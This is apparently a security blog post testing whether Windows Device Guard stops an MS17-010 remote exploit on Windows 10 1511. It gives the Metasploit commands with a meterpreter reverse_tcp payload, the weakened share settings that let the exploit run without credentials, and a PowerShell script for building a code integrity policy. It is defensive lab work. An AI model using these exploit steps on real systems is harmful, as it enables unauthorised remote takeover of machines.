top of page

WDAC (Device Guard) vs RCE


Applocker failed to prevent a Remote Code Exploit (here), so let's see if Device Guard does any better...

The tests will be carried out in isolation, all other security protections will be disabled. The only service protecting Windows from being pillaged is Device Guard. Microsoft seems to be going out of its way to prevent RCE's executing against Windows 10. After a few days of research and trialling, the only remote exploit that successfully works without requiring credentials is Windows 10 1511 using MS17-010. Slightly disappointing as I was hoping to use 2020-0796 and 1903 or 1909. 2020-0796 is still POC and with my setup, it appears to produce lots of BSoD.  

Using Windows 10 1511 is a bit of a concern as Device Guard is upgraded with Windows 10 1703 (Creators). RCE's may be able to bypass 1511 but not 1703 and onwards, but the test wouldn't reflect that. 

The attacker is Kali on running MS17_010_PSExec

The victim is Windows 10 x64 1511 on running on Asus Zenbook 301 

To exploit using MS17_010_PSExec without providing credentials:

'Restrict anonymous access to named pipes and shares' was disabled

'Shares that can be accessed anonymously' has Admin$ added

In Kali start 'msfconsole'

use exploit/windows/smb/ms17_010_psexec

set rhost

set lhost

set payload windows/meterpreter/reverse_tcp


To easy and the now the proud owner of the Zenbook.

Device Guard has the following requirements:


Hardware Requirements

UEFI Native Mode
Windows 10/2016 x64
SLAT and Virtualization Extensions (Intel VT or AMD V)

Windows Features

Windows Defender Application Guard (Isolation mode prior to 1703)

Hyper-V Platform (Not required after 1603)

Hyper-V Hypervisor

GPO Settings

Computer Configuration > Administrative Templates > System > Device Guard

Turn on Virtualization Based Security (enable)

Secure Boot and DMA Protection

Enable Virtualization Based Protection of Code

Deploy Code Integrity Policy (enable)


(C:\DeviceGuard\SIPolicy.p7b is automatically copied and converted to C:\Windows\System32\Codeintegrity\)

To force the conversion run the following: Invoke-CimMethod -Namespace root/Microsoft/Windows/CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName update -Arguments @{filepath = "C:\DeviceGuard\SIPolicy.p7b"}

The system will create SIPolicy.p7b and a reboot will enforce Device Guard




#Enable required Hypervisor feature 

 #Enable all features and then remove unwanted. Unable to add Hyper-V Hypervisor as Hyper-V platform is required
 Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-All -NoRestart
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Tools-All -NoRestart
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Services -NoRestart

#Sets Working Folder for DG
$CIPolicyPath = "C:\DeviceGuard"

$IntialCIPolicy = $CIPolicyPath+"\initialScan.xml"


$CIPolicyBin = $CIPolicyPath+"\SIPolicy.p7b"

#C:\DeviceGuard\CIPolicy.txt - Output from initial policy audit
$CIPolicyError = $CIPolicyPath+"\CIPolicy.txt"

#Creates SIPolicy.p7b based on the IntialCIPolicy.xml
New-CIPolicy -Level Publisher -Fallback Hash -FilePath $IntialCIPolicy -UserPEs 3> $CIPolicyError

#Enforces UMCI
Set-RuleOption -FilePath $IntialCIPolicy  -Option 0

#Enforcement Mode enabled
Set-RuleOption -FilePath $IntialCIPolicy  -Option 3 -delete

#Converts the faudit to a p7b file copies to C:\DeviceGuard\

#GPO is set to move SIPolicy.p7b to C:\Windows\System32\CodeIntegrity
ConvertFrom-CIPolicy -XmlFilePath $IntialCIPolicy  -BinaryFilePath $CIPolicyBin 

#Applies DG policy without a reboot
Invoke-CimMethod -Namespace root/Microsoft/Windows/CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName update -Arguments @{filepath = "C:\Windows\System32\CodeIntegrity\SIPolicy.p7b"}

The script can be downloaded from Github (here).

Run GPUpdate and reboot

To test Device Guard I attempted to run putty.exe and a few other applications, any exe not present during the audit wouldn't successfully run.

The CodeIntegrity Eventlogs reported that the programs were not approved

And now for the Remote Code Exploit..........

The good news is that Device Guard prevented the exploit on repeated attempts, that's a good day at the office, the system is safe and the attacker frustrated.

bottom of page